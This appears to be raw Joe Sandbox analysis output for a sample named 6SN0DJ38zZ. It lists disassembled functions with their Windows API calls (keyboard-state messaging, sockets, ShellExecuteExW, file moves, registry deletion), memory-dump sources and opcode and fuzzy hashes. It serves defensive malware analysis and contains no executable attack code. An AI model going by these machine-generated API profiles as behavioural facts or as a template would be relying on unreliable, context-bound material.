Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetSystemMetrics.USER32(0000000F), ref: 00A0D47C
GetSystemMetrics.USER32(0000000F), ref: 00A0D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00A0D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A0D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A0D716
ShowWindow.USER32(00000003,00000000), ref: 00A0D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00A0D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00A0D77D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
Instruction ID: fa225f11f4484509435b8b4897fe2a8a09639b445958a284109d75901f54b73c
Opcode Fuzzy Hash: 08e5fc65a15a2ab46ff4ac6d8638b84b278d839d538cd9a79f47fc2f73e35aa1
Instruction Fuzzy Hash: E2B19A76A00229EFDF14CFA8D9C57AD7BB1BF04701F088169EC48AF295D735A990CB90

Function 00982A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 00982ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00982B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,009BC1C7,00000004,00000000,00000000,00000000), ref: 009BC286

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
Instruction ID: ccd705550d603a4f9486e7eaadaadbd2e6acd72b7f9647d3cf02778bb139dab0
Opcode Fuzzy Hash: cb1d2942d5a3097ef62f83649c382717de0db72a8b2caa1d8b54de602e54cc2d
Instruction Fuzzy Hash: 0A412B74608680AFCB3DEBA8DD88B6B7B99AF86310F148C1DE057967E1C635D842D711

Function 009E70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009E70DD

Part of subcall function 009A0DB6: std::exception::exception.LIBCMT ref: 009A0DEC
Part of subcall function 009A0DB6: __CxxThrowException@8.LIBCMT ref: 009A0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 009E7114
EnterCriticalSection.KERNEL32(?), ref: 009E7130
_memmove.LIBCMT ref: 009E717E
_memmove.LIBCMT ref: 009E719B
LeaveCriticalSection.KERNEL32(?), ref: 009E71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009E71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 009E71DE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 21e981b3e0f940910700461bab35f6cfd77ca07975a891f4059bdae66284086d
Instruction ID: 23670b030b3197d30cb7ffb0d452dc17a5bf7fadba9fbd5b6ddd32c01cb0229d
Opcode Fuzzy Hash: 21e981b3e0f940910700461bab35f6cfd77ca07975a891f4059bdae66284086d
Instruction Fuzzy Hash: 06317072900205EFCF10EFA5DC85AAEB778EF89310F1441A5F904AB246DB709E11DBA1

Function 00A061D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A061EB
GetDC.USER32(00000000), ref: 00A061F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A061FE
ReleaseDC.USER32(00000000,00000000), ref: 00A0620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A06246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A06257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A0902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00A06291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A062B1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
Instruction ID: 06c0c8ce03ce5eb486580e63714148d3e396daf7ec6fc56c745831f8f39b335c
Opcode Fuzzy Hash: 1aeed73bc762a889b4978bdf79098edb2e1bdb601d0df11b893ecba243b0338b
Instruction Fuzzy Hash: 9C314F72101218BFEF218F50DC8AFEA3BA9EF49765F044065FE08AA191D7759C52CB74

Function 009DBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 009DBBC4
_memcmp.LIBCMT ref: 009DBBE6
_memcmp.LIBCMT ref: 009DBBFE
_memcmp.LIBCMT ref: 009DBC11
_memcmp.LIBCMT ref: 009DBC2B
_memcmp.LIBCMT ref: 009DBC3E
_memcmp.LIBCMT ref: 009DBC56
_memcmp.LIBCMT ref: 009DBC71

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
Instruction ID: d226ec2d6661a0f6c98e605bd04233049185fcdd9b2e453ec30345ed04f11718
Opcode Fuzzy Hash: 1d999651f4e050a66cd02f8c21c190d254a5af34acfc8737f382fe46c3be30aa
Instruction Fuzzy Hash: DE21C261681205BBA6046A399D42FFB779CBF56388F058423FE0596743EB28DE2183E1

Function 009EEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9

_wcstok.LIBCMT ref: 009EEC94
_wcscpy.LIBCMT ref: 009EED23
_memset.LIBCMT ref: 009EED56

Strings

X, xrefs: 009EED93

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: f2b71ee1ffcf5ce540557f91988d2f7f4e789156b521f4e1cde199d6fb374fcc
Instruction ID: 6194d90e276ff66464c399ee35ea6ad6e9e57153aa2a11e2a920211b5d0106c1
Opcode Fuzzy Hash: f2b71ee1ffcf5ce540557f91988d2f7f4e789156b521f4e1cde199d6fb374fcc
Instruction Fuzzy Hash: DDC16A716083419FC765EF64D881B6AB7E4BF85314F14492DF8999B3A2DB30EC45CB82

Function 009F6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009F6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009F6C21
WSAGetLastError.WSOCK32(00000000), ref: 009F6C34
htons.WSOCK32(?,?,?,00000000,?), ref: 009F6CEA
inet_ntoa.WSOCK32(?), ref: 009F6CA7

Part of subcall function 009DA7E9: _strlen.LIBCMT ref: 009DA7F3
Part of subcall function 009DA7E9: _memmove.LIBCMT ref: 009DA815

_strlen.LIBCMT ref: 009F6D44
_memmove.LIBCMT ref: 009F6DAD

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 29e70fe357f461b03f20cb17e4e2bb543704ef89ae9362d2b5bf74dc36d7525a
Instruction ID: 9343a9ac74fbb5f32fc30f340d609413dea794f66846197ad39d81d3c3d02a56
Opcode Fuzzy Hash: 29e70fe357f461b03f20cb17e4e2bb543704ef89ae9362d2b5bf74dc36d7525a
Instruction Fuzzy Hash: 34819C72208304ABC710EF64CC86F7BB7A8ABC4714F54491DFA559B2D2DA71ED05CB92

Function 00981424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
Instruction ID: 8499e55215c6239e187281d1102884fb46b9820271e1dcc5a25b3e4ff757e335
Opcode Fuzzy Hash: a723d84ecc6461508bf18a6cef5d0307611d894dc16745084e926ffd9664114b
Instruction Fuzzy Hash: 5A716F31900109EFDB14DFA8CC89EBEBB79FF85320F148159F915AA351C774AA52CB60

Function 00A0B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01383EA8), ref: 00A0B3EB
IsWindowEnabled.USER32(01383EA8), ref: 00A0B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A0B4DB
SendMessageW.USER32(01383EA8,000000B0,?,?), ref: 00A0B512
IsDlgButtonChecked.USER32(?,?), ref: 00A0B54F
GetWindowLongW.USER32(01383EA8,000000EC), ref: 00A0B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A0B589

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
Instruction ID: 848cb78e872ad5b7055593a5cd6781b4a26b0d20c1f16c160038c97b6725cbd8
Opcode Fuzzy Hash: 3f083af7db40dc9bffd63d91bab2fd01faa7a8707e0b64c9ac75c4deb6b27931
Instruction Fuzzy Hash: 6D71A338610208EFDB20DF64EA94FBA77B5EF49300F144459FA45972E2C732AA41DB61

Function 009FF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009FF448
_memset.LIBCMT ref: 009FF511
ShellExecuteExW.SHELL32(?), ref: 009FF556

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9

GetProcessId.KERNEL32(00000000), ref: 009FF5CD
CloseHandle.KERNEL32(00000000), ref: 009FF5FC

Strings

@, xrefs: 009FF525

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: c7af829d1f549656a4083dfdd0159aecf38e8cf08e1c78a11c5aabcd3522fe17
Instruction ID: be9c3d5f0e906dfd5f0a7f4cd2d60c723822095ff8da2706ee411039d801ed31
Opcode Fuzzy Hash: c7af829d1f549656a4083dfdd0159aecf38e8cf08e1c78a11c5aabcd3522fe17
Instruction Fuzzy Hash: 6E619E75A006199FCF14EFA4C495ABEBBF5FF89314F148069E855AB351CB30AD41CB90

Function 009E0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 009E0F8C
GetKeyboardState.USER32(?), ref: 009E0FA1
SetKeyboardState.USER32(?), ref: 009E1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 009E1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 009E104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 009E1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009E10B8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
Instruction ID: ee8b4483283e05761b1dc135c6edcb5248b19e9d4a91b011742a7e1ab079673d
Opcode Fuzzy Hash: 8e3f2897d61d64b3920656a662a63aadf289cee8e16fbcfe2264ac9a740fde02
Instruction Fuzzy Hash: 1F5113B06087D53EFB3742358C15BBABEAD6B46300F088989E1D4968D3C2E9ECD9D751

Function 009E0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009E0DA5
GetKeyboardState.USER32(?), ref: 009E0DBA
SetKeyboardState.USER32(?), ref: 009E0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009E0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009E0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009E0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009E0EC9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
Instruction ID: 361c62d8f51a6c4e10b209c8f56a59c8cfdfed684b5fe81a498e0378910e9824
Opcode Fuzzy Hash: f443a157030e1ad2fabbcf25d345e2c9efcf53288511a42a197be4d283665849
Instruction Fuzzy Hash: E55102A05087D53DFB3383768C45B7ABEAD6B86300F08899DE1D8568C2C3E5ACD9D760

Function 009E55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009E560A
_wcsncpy.LIBCMT ref: 009E563F
_wcsncpy.LIBCMT ref: 009E5671
_wcsncpy.LIBCMT ref: 009E56A4
_wcsncpy.LIBCMT ref: 009E56E6
_wcsncpy.LIBCMT ref: 009E5720
_wcsncpy.LIBCMT ref: 009E574F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
Instruction ID: 854e42d2e01ead5c9e9e1b46c5fceb19c35e482e5eec322fc36a2c056ba59942
Opcode Fuzzy Hash: 1eab5a9e11308f9f5e69d4b928d2339ae827a7b710b970c77409af0de9d089b6
Instruction Fuzzy Hash: 1741A465C1065476CB12EBB88C46BCFB3BC9F86310F508956F508E3221EB34E655C7E6

Function 009E3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B

Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4

lstrcmpiW.KERNEL32(?,?), ref: 009E36B7
_wcscmp.LIBCMT ref: 009E36D3
MoveFileW.KERNEL32(?,?), ref: 009E36EB
_wcscat.LIBCMT ref: 009E3733
SHFileOperationW.SHELL32(?), ref: 009E379F

Strings

\*.*, xrefs: 009E372D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 9f81368f3de736da47ae412f15d66131b5e48adbadc658c940b4851d73af9636
Instruction ID: 052ab6cd0e464a6733135931d7897559fb8d1c825b3d488b4bbdaf650318565e
Opcode Fuzzy Hash: 9f81368f3de736da47ae412f15d66131b5e48adbadc658c940b4851d73af9636
Instruction Fuzzy Hash: CF41B371508384AEC752EF65C446ADFB7ECAF89390F00482EF499C3251EB34DA89CB52

Function 00A07291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A072AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07351
IsMenu.USER32(?), ref: 00A07369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A073B1
DrawMenuBar.USER32 ref: 00A073C4

Strings

0, xrefs: 00A0729E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: f6e826454518e712ae085dbe52dd7253e79f0f86c5112bde93fabfe125b9e538
Instruction ID: beec0ac7ac413a4edbca313b78060e1f228f2744dd82513446a4165fa1977b0e
Opcode Fuzzy Hash: f6e826454518e712ae085dbe52dd7253e79f0f86c5112bde93fabfe125b9e538
Instruction Fuzzy Hash: F8411875A04208EFEB20DFA0E884A9EBBF4FB05314F148529FD55AB290D731AD51EF51

Function 00A00FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A00FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A00FFE
FreeLibrary.KERNEL32(00000000), ref: 00A010B5

Part of subcall function 00A00FA5: RegCloseKey.ADVAPI32(?), ref: 00A0101B
Part of subcall function 00A00FA5: FreeLibrary.KERNEL32(?), ref: 00A0106D
Part of subcall function 00A00FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A01090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A01058

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 17222ca0e3408ab0a9e33288e1ac29797fd95c43619e72c2913adc4c138065e5
Instruction ID: 47a9570d45486237138e3eb66d64eca78c0cdb7d42fcd088bb3fa1ff617a6a50
Opcode Fuzzy Hash: 17222ca0e3408ab0a9e33288e1ac29797fd95c43619e72c2913adc4c138065e5
Instruction Fuzzy Hash: BD31ED7190110DBFEB25DF94EC89EFFB7BCEF08310F400169E551A2191EB759E869AA0

Function 00A062CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

